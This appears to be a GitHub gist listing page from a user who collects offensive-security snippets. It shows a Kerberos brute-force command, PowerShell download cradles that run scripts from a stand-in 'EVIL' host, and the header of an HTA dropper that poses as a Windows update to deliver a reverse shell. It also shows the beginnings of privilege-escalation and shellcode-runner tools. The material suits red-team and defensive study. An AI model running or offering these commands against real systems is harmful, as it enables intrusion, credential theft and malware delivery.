Skip to content

Instantly share code, notes, and snippets.

View an00byss's full-sized avatar

An00byss an00byss

View GitHub Profile
@an00byss
an00byss / kerberos_attacks_cheatsheet.md
Created August 31, 2020 14:45 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@an00byss
an00byss / PowerShell Cradles
Created April 9, 2021 23:19
Collection of PowerShell Download cradles
### IE Cradle
iex (iwr 'https://raw.githubusercontent.com/BradyDonovan/PSCalcPayload/master/script.ps1' -UseBasicParsing)
### normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
### PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
### hidden IE com object
@an00byss
an00byss / namemash.py
Created February 4, 2022 21:37 — forked from superkojiman/namemash.py
Creating a user name list for brute force attacks.
#!/usr/bin/env python
import sys
import os.path
if __name__ == "__main__":
if len(sys.argv) != 2:
print("usage: {} names.txt".format((sys.argv[0])))
sys.exit(0)
if not os.path.exists(sys.argv[1]):
import base64
import re
import xml.dom.minidom
import json
import uuid
import struct
import string
import random
import hashlib
import time
@an00byss
an00byss / Update.hta
Created January 30, 2023 18:16 — forked from r00t-3xp10it/Update.hta
meterpeter v2.10.10 - payload HTA dropper
<!--
Hta_Version: 1.0.1
Author: @r00t-3xp10it (ssa)
Application: meterpeter v2.10.10 dropper
.DESCRIPTION
This HTA changes PS 'ExecutionPolicy' to 'UnRestricted', presents a msgbox
pretending to be a security KB5005101 21H1 update, while downloads\executes
meterpeter client.ps1 (rev_tcp_shell) in background from attacker werbserver.
@an00byss
an00byss / oauthServer.go
Created December 2, 2023 00:58 — forked from invokethreatguy/oauthServer.go
A mini OAuth server for Azure
package main
import (
"crypto/tls"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"strings"
)
@an00byss
an00byss / LICENSE
Created January 18, 2024 17:42 — forked from brianbruggeman/LICENSE
Convert Viscosity to Open VPN
Public Domain
@an00byss
an00byss / certifried_with_krbrelayup.md
Created May 10, 2024 15:30 — forked from S3cur3Th1sSh1t/certifried_with_krbrelayup.md
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.

Prerequisites:

@an00byss
an00byss / pwshellcode.py
Created November 19, 2024 04:33 — forked from mcorybillington/pwshellcode.py
Simple script to tie together TrustedSec's work on running shellcode via powershell with MSFVenvom. Very little effort made to evade/hide/bypass anything, just a simple way to run shellcode in memory if you get command execution and can run PowerShell on a pentest. Stick to x86 payloads from MSFVenom.
## Credits to the following projects for a lot of this powershell code and just general inspiration
## https://github.com/chvancooten/OSEP-Code-Snippets
## https://www.trustedsec.com/blog/native-powershell-x86-shellcode-injection-on-64-bit-platforms/
from argparse import ArgumentParser
import subprocess
import base64
import os